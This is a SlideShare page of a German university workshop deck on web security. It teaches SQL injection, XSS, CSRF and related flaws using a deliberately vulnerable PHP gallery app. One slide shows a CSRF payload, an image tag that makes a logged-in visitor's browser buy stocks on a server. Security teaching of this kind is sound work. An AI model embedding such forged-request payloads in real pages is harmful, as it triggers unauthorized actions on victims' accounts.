Website-Security

575 views

Published on

http://fg-informatik.unibas.ch/wiki/index.php/Website-Security

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
575
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
7
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Website-Security

  1. 1. fg.workshop
  2. 2. fg.workshop
  3. 3. fg.workshop> 200’000 Kreditkartendatenmittels SQL Injection gestohlen> 40 Millionen Kreditkartendatenunverschlüsselt abgespeichert
  4. 4. fg.workshop
  5. 5. fg.workshopWeb Security"A good programmer is someone who always looks both ways beforecrossing a one-way street." — Doug LinderMarcel Büchler - Ivan Giangreco
  6. 6. fg.gallery fg.workshop• Galerie zum Hochladen von Bildern• einfache Benutzerverwaltung• Benutzer können Bilder bewerten• PHP, MySQL
  7. 7. fg.workshopHappy HackingFinde die Sicherheitslücken.
  8. 8. fg.workshopfg.gallery• SQL-Injection • Missing Encryption of Sensitive Data• Information Exposure through an Error Message • Use of Hard-coded Credentials• Missing Authentication for Critical • Session Hijacking Function • Use of Blacklists instead of• Cross-Site-Scripting Whitelists• Cross-Site-Request Forgery• Improper Access Control• Reliance on Untrusted Inputs (Spoofed HTTP Requests)• Unrestricted Upload of File with Dangerous Type
  9. 9. fg.workshopSQL Injection
  10. 10. fg.workshopCross-Site Scripting (XSS) Cookie wird an einen fremden Server geschickt! Und dasselbe hexadezimal codiert:
  11. 11. fg.workshopSession Hijacking
  12. 12. fg.workshopCross-Site Request Forgery (CSRF) HTTP Request HTTP Response Logged in
  13. 13. fg.workshopCross-Site Request Forgery (CSRF) Comment as you like Comment: HTTP Request HTTP Response
  14. 14. fg.workshopCross-Site Request Forgery (CSRF) Comment as you like Comment: HTTP Request <img src=”http:// HTTP Response www.server.de/buy.php? num_of_stocks=1000”/>
  15. 15. fg.workshopCross-Site Request Forgery (CSRF) Logged in HTTP Request HTTP Request http://www.server.de/buy.php?num_of_stocks=1000
  16. 16. fg.workshophttp://cwe.mitre.org/top25/http://phpsec.org/projects/guide/
  17. 17. fg.workshopQ&A

×